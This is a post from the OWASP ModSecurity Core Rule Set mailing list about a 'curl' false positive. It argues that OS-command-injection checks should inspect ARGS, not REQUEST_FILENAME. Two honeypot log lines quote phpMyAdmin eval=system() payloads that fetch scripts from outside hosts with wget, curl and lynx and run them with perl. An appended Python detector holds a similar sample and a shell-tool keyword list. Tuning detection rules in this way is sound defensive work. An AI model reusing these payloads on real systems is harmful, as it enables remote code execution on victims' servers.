I am reviewing an old CRS Jira ticket on a false positive hit for the "curl" command - https://www.modsecurity.org/tracker/browse/CORERULES-78
In reviewing this, it looks like we need to remove the REQUEST_FILENAME from the list of vars inspected. From my research, the only real location to look for OS command injection is within ARGS or REQUEST_HEADERS. As an example, look at this recent blog post I did with some example attacks targeting curl - http://blog.spiderlabs.com/2012/02/honeypot-alert-phpmyadmin-code-injection-attacks.html

62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O p2.txt;curl -O http://199.115.228.9/vp.txt; mv vp.txt d.txt;lyxn -DUMP http://199.115.228.9/vp.txt >p3.txt;perl d.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 226 "-" "curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.12.6.2 zlib/1.2.3 libidn/1.9 libssh2/1.2.4"

195.145.156.126 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config/config.inc.php?eval=system('echo cd /tmp;wget http://dinte.altervista.org/apache_32.png -O p2.txt;curl -O http://dinte.altervista.org/apache_32.png; mv apache_32.png p.txt;lyxn -DUMP http://dinte.altervista.org/apache_32.png >p3.txt;perl p.txt; perl p2.txt;perl p3.txt;rm -rf *.txt'); HTTP/1.1" 404 225 "-" "curl/7.18.1 (i686-suse-linux-gnu) libcurl/7.18.1 OpenSSL/0.9.8g zlib/1.2.3 libidn/1.8"

These attacks are with ARGS. Has anyone ever legitimately had an OS command attack targeting the REQUEST_FILENAME?

--
Ryan Barnett
Trustwave SpiderLabs
ModSecurity Project Leader
OWASP ModSecurity CRS Project Leader
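An added example (not part of the post, and not CRS's own rule logic) showing the effect of the proposed change: the same OS-command keyword check run over ARGS only versus ARGS plus REQUEST_FILENAME, on constructed access-log lines modelled on the ones above. The keyword pattern, IPs and hostnames are placeholders chosen for the illustration.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed Apache combined-format lines (IPs/hosts are placeholders, not real IoCs):
# line 1 is a benign request whose *path* contains "curl", line 2 is an eval= injection
# like the honeypot entries in the post, line 3 is ordinary traffic from a curl client.
SAMPLE_LOG = """\
192.0.2.10 - - [21/Feb/2012:04:25:55 -0600] "GET /docs/curl/manual.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.0.2.11 - - [21/Feb/2012:05:42:27 -0600] "GET /mysql/config.inc.php?eval=system('cd%20/tmp;curl%20-O%20http://example.invalid/p.txt;perl%20p.txt') HTTP/1.1" 404 225 "-" "curl/7.19.7"
192.0.2.12 - - [21/Feb/2012:06:00:00 -0600] "GET /index.php?q=hello HTTP/1.1" 200 100 "-" "curl/7.19.7"
"""

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# Illustrative word-list check in the spirit of the old CRS OS-command rule (not its actual regex).
OS_CMD_WORDS = re.compile(r"\b(?:curl|wget|lynx|perl)\b", re.IGNORECASE)

def parse_args(query):
    """Decode a query string into a dict, the way ModSecurity exposes ARGS."""
    args = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            args[unquote_plus(name)] = unquote_plus(value)
    return args

def parse_request(line):
    """Split one log line into REQUEST_FILENAME and ARGS; None if no request line found."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("uri"))
    return {"filename": unquote(parts.path), "args": parse_args(parts.query)}

def inspect(req, targets=("ARGS",)):
    """Return (variable, name) pairs that hit, inspecting only the listed variables."""
    hits = []
    if "REQUEST_FILENAME" in targets and OS_CMD_WORDS.search(req["filename"]):
        hits.append(("REQUEST_FILENAME", req["filename"]))
    if "ARGS" in targets:
        hits += [("ARGS", n) for n, v in req["args"].items() if OS_CMD_WORDS.search(v)]
    return hits

def scan(log_text, targets=("ARGS",)):
    """Apply inspect() to every line; returns [(line_no, hits)] for lines that alerted."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), 1):
        req = parse_request(line)
        if req and inspect(req, targets):
            findings.append((n, inspect(req, targets)))
    return findings

if __name__ == "__main__":
    print("ARGS only:            ", scan(SAMPLE_LOG))
    print("ARGS+REQUEST_FILENAME:", scan(SAMPLE_LOG, ("ARGS", "REQUEST_FILENAME")))
```

With REQUEST_FILENAME in the target list the benign /docs/curl/manual.html request alerts; with ARGS alone it does not, while the eval= injection is still caught.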
_______________________________________________
Owasp-modsecurity-core-rule-set mailing list
Owasp-modsecurity-core-rule-set@lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-modsecurity-core-rule-set